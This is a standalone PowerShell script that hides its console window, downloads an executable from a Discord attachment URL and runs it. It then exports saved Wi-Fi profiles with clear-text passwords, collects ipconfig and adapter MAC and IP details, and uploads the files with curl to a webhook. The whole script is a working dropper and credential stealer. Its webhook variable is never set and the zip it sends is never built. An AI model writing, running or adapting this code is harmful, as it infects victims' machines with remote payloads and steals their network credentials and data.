Add-Type -Name Window -Namespace Console -MemberDefinition '
[DllImport("Kernel32.dll")]
public static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow);
'
$consolePtr = [Console.Window]::GetConsoleWindow()
[Console.Window]::ShowWindow($consolePtr, 0)     

Invoke-WebRequest 'https://cdn.discordapp.com/attachments/975173196103966800/1435755657705029790/fun.exe?ex=690d1f27&is=690bcda7&hm=b2aad148ae82f9f7533f919ccdbe006c76d041af5dab43587d910bf9de9d3466&' -OutFile "$env:LOCALAPPDATA\Temp\fun.exe" ;Start-Sleep 1;  "$env:LOCALAPPDATA\Temp\fun.exe" 

Start-Sleep 1;
$e = "$env:LOCALAPPDATA\Temp"
$zip = "$env:TEMP\funny_stuff_folder.zip"
ipconfig /all | Out-File "$e\ipcfg.txt"
netsh wlan export profile key=clear folder=$e | Out-Null

$wifiFile = "$e\wifi.txt"
Get-ChildItem "$e\Wi-Fi*.xml" | ForEach-Object {
    $x = [xml](Get-Content $_)
    $ssid = $x.WLANProfile.SSIDConfig.SSID.name
    $pass = $x.WLANProfile.MSM.Security.SharedKey.KeyMaterial
    "SSID:$ssid | Password:$pass" | Out-File -Append -FilePath $wifiFile
}


$netInfoText = (Get-NetAdapter | ForEach-Object {
    $i = $_
    $ips = Get-NetIPAddress -InterfaceIndex $i.ifIndex -ErrorAction SilentlyContinue
    $ipv4 = ($ips | Where-Object AddressFamily -eq IPv4 | Select-Object -Expand IPAddress -ErrorAction Ignore) -join ', '
    $ipv6 = ($ips | Where-Object AddressFamily -eq IPv6 | Select-Object -Expand IPAddress -ErrorAction Ignore) -join ', '
    "$($i.Name): MAC=$($i.MacAddress) IPv4=$ipv4 IPv6=$ipv6"
}) -join "`n"



# Send to discord

$content = "Network summary:`n```$netInfoText```"


curl.exe -X POST "$wh" -F "content=$content" -F "file1=@$zip" -F "file2=@$wifiFile" -F "file3=@$e\ipcfg.txt"


# cleanup
#cls



#exit quickly
#taskkill /F /IM pwsh.exe /IM powershell.exe 2>$null 
